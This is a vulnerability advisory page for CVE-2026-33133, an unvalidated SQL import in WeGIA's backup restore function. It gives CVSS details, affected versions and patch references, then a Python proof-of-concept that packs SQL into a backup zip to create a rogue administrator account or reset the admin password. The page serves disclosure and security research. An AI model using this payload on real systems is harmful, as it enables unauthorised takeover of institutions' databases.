Security Vulnerability Report
CVE-2026-33133 CVSS 7.2 HIGH

Published: 2026-03-20 11:18:03
Last Modified: 2026-03-20 19:29:20

Description

WeGIA is a web manager for charitable institutions. In versions 3.6.5 and 3.6.6, the loadBackupDB() function imports SQL files from uploaded backup archives without any content validation. An attacker can craft a backup archive containing arbitrary SQL statements that create rogue administrator accounts, modify existing passwords, or execute any database operation. This was introduced in commit 370104c. This issue was patched in version 3.6.7.

CVSS Details

CVSS v3.1 (Primary)
CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploitability Score: 1.2
Impact Score: 5.9

CVSS v4.0 (Secondary)
CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weakness: CWE-89 (SQL Injection)

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:3.6.5:*:*:*:*:*:*:* - VULNERABLE (WeGIA 3.6.5)
cpe:2.3:a:wegia:wegia:3.6.6:*:*:*:*:*:*:* - VULNERABLE (WeGIA 3.6.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import zipfile

# Simulating the creation of a malicious backup archive for CVE-2026-33133
# The vulnerability allows arbitrary SQL execution via backup import.


def create_malicious_backup(filename='malicious_backup.zip'):
    # Malicious SQL content to create a rogue admin account
    # Note: The actual table structure depends on WeGIA's schema.
    # This is a conceptual Proof of Concept.
    malicious_sql = """
-- Attempt to create a new administrator
INSERT INTO usuarios (nome, login, senha, email, nivel, status)
VALUES ('Attacker', 'attacker_admin', 'md5_hash_of_password', '[email protected]', 'admin', '1');

-- Or modify existing password (Example)
-- UPDATE usuarios SET senha = 'md5_hash_of_newpass' WHERE login = 'admin';
"""
    # Name the SQL file inside the archive as expected by the application
    sql_filename = 'backup.sql'

    # Create the zip file
    with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zipf:
        zipf.writestr(sql_filename, malicious_sql)

    print(f"[+] Malicious backup archive '{filename}' created successfully.")
    print(f"[+] It contains '{sql_filename}' with SQL injection payload.")
    print("[+] Upload this file to the WeGIA backup restore function (requires High Privileges).")


if __name__ == "__main__":
    create_malicious_backup()
```

References

https://github.com/LabRedesCefetRJ/WeGIA/pull/1459 (Issue Tracking, Patch)
https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.7 (Product, Release Notes)
https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qqff-p8fc-hg5f (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data
